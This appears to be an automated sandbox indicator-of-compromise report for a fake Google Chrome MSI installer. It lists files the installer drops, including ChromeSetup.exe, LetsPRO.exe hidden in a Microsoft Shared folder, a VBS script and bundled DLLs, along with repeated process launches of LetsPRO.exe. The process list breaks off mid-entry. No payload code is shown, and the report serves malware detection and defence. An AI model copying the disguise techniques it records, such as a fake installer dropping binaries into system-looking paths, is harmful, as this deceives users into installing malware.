IOC Report
sutup-Chrome.13.26.x64.msi

loading gif

Files

File Path
Type
Category
Malicious
sutup-Chrome.13.26.x64.msi
Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Security: 0, Code page: 936, Revision Number: {924DFDB4-5E1D-409E-8393-FA9658AA79C4}, Number of Words: 2, Subject: Google Chrome, Author: Google, Name of Creating Application: Google Chrome, Template: ;2052, Comments: Installer Google Chrome , Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Tue Apr 23 15:38:46 2024, Last Saved Time/Date: Tue Apr 23 15:38:46 2024, Last Printed: Tue Apr 23 15:38:46 2024, Number of Pages: 450
initial sample
 malicious
C:\Program Files (x86)\ChromeSetup.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\msvcp100.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\msvcr100.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleCrashHandler.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleCrashHandler64.exe
PE32+ executable (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdate.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateBroker.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateComRegisterShell64.exe
PE32+ executable (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateOnDemand.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdate.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_am.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ar.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_bg.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_bn.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ca.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_cs.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_da.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_de.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_el.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_en-GB.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_en.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_es-419.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_es.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_et.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_fa.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_fi.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_fil.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_fr.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_gu.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_hi.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_hr.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_hu.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_id.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_is.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_it.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_iw.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ja.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_kn.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ko.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_lt.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_lv.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ml.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_mr.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ms.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_nl.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_no.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_pl.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_pt-BR.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_pt-PT.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ro.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ru.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_sk.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_sl.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_sr.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_sv.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_sw.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ta.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_te.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_th.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_tr.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_uk.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ur.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_vi.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_zh-CN.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_zh-TW.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\psmachine.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\psmachine_64.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\psuser.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Program Files (x86)\Google\Update\1.3.36.372\psuser_64.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Program Files (x86)\WeGame\Lua51.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Program Files (x86)\WeGame\WeGame.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Program Files (x86)\WeGame\adapt_for_imports.dll
PE32 executable (DLL) (console) Intel 80386, for MS Windows
dropped
 malicious
C:\Program Files (x86)\WeGame\beacon_sdk.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Program Files (x86)\WeGame\common.dll
PE32 executable (DLL) (console) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\99944\1
data
dropped
 malicious
C:\Users\user\99944\144977.vbs
ASCII text, with CRLF line terminators
dropped
 malicious
C:\Users\user\99944\LetsPRO.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Windows\Installer\MSIB404.tmp
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Windows\Installer\MSIB54D.tmp
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Windows\Installer\MSIB59C.tmp
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Windows\Installer\MSIB5FB.tmp
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Windows\SystemTemp\GUMBC12.tmp\GoogleCrashHandler.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Windows\SystemTemp\GUMBC12.tmp\GoogleCrashHandler64.exe
PE32+ executable (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdateBroker.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdateComRegisterShell64.exe
PE32+ executable (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdateCore.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdateOnDemand.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdateSetup.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdate.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_am.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ar.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_bg.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_bn.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ca.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_cs.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_da.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_de.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_el.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_en-GB.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_en.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_es-419.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_es.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_et.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_fa.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_fi.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_fil.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_fr.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_gu.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_hi.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_hr.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_hu.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_id.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_is.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_it.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_iw.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ja.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_kn.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ko.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_lt.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_lv.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ml.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_mr.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ms.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_nl.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_no.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_pl.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_pt-BR.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_pt-PT.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ro.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ru.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_sk.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_sl.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_sr.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_sv.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_sw.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ta.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_te.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_th.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_tr.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_uk.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ur.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_vi.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_zh-CN.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_zh-TW.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Windows\SystemTemp\GUMBC12.tmp\psmachine.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Windows\SystemTemp\GUMBC12.tmp\psmachine_64.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Windows\SystemTemp\GUMBC12.tmp\psuser.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Windows\SystemTemp\GUMBC12.tmp\psuser_64.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Config.Msi\5bb04c.rbs
data
modified
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\1
data
dropped
C:\Windows\Installer\5bb04a.msi
Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Security: 0, Code page: 936, Revision Number: {924DFDB4-5E1D-409E-8393-FA9658AA79C4}, Number of Words: 2, Subject: Google Chrome, Author: Google, Name of Creating Application: Google Chrome, Template: ;2052, Comments: Installer Google Chrome , Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Tue Apr 23 15:38:46 2024, Last Saved Time/Date: Tue Apr 23 15:38:46 2024, Last Printed: Tue Apr 23 15:38:46 2024, Number of Pages: 450
dropped
C:\Windows\Installer\MSIB403.tmp
data
dropped
C:\Windows\Installer\SourceHash{26E6D275-3FC7-41A2-B8C2-458B639029D2}
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Installer\inprogressinstallinfo.ipi
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Windows\SystemTemp\GUTBC13.tmp
POSIX tar archive (GNU)
dropped
C:\Windows\Temp\__PSScriptPolicyTest_djfjjprx.ib4.psm1
ASCII text, with no line terminators
dropped
C:\Windows\Temp\__PSScriptPolicyTest_g1k0gdit.4vd.ps1
ASCII text, with no line terminators
dropped
C:\Windows\Temp\~DF13444FAED326CFE4.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF2606DFAF92E1788E.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF2C2EEF8CDB43B84F.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF31F011CF3971BA60.TMP
data
dropped
C:\Windows\Temp\~DF465AE04596FEE092.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF5C4DA31D46AF7F16.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF6980B5A144D98980.TMP
data
dropped
C:\Windows\Temp\~DF8203C67729525379.TMP
data
dropped
C:\Windows\Temp\~DF96C0D5871EAB58D2.TMP
data
dropped
C:\Windows\Temp\~DF983CA76AAB82BF40.TMP
data
dropped
C:\Windows\Temp\~DFA13276FCEDE38A2A.TMP
data
dropped
C:\Windows\Temp\~DFAE75FECF180B7D8D.TMP
data
dropped
There are 166 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
malicious
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
malicious
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
malicious
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
malicious
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
malicious
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
malicious
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
malicious
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
malicious
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
 malicious
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
malicious
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
malicious
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
malicious
C:\Program Files (x86)\ChromeSetup.exe
"C:\Program Files (x86)\ChromeSetup.exe"
 malicious
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
malicious
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
